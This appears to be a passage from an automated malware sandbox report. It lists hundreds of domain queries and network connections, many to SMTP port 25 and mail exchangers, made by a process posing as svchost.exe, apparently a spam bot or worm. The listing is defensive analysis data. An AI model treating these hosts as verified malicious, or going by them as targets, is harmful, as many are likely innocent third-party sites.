                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.210.102.34 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.tyrns.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.65.224 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.12.155.123 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.221.250.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.hyabmagneter.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.186 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.72 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.164.117.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.54.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.92.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.98.236.253 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.86.6.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.165.223.27 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 68.71.135.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.24.177 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.168.185.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.176.155.206 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.3.14 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.193.204.92 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.244.106.2 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.19.68 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.128.23.153 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wkhk.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.1.82 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pb-games.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.217.218.26 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.251.31.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.251.31.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.112.187.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.sclover3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 97.74.42.79 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.204.18.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.80.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.142.131.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
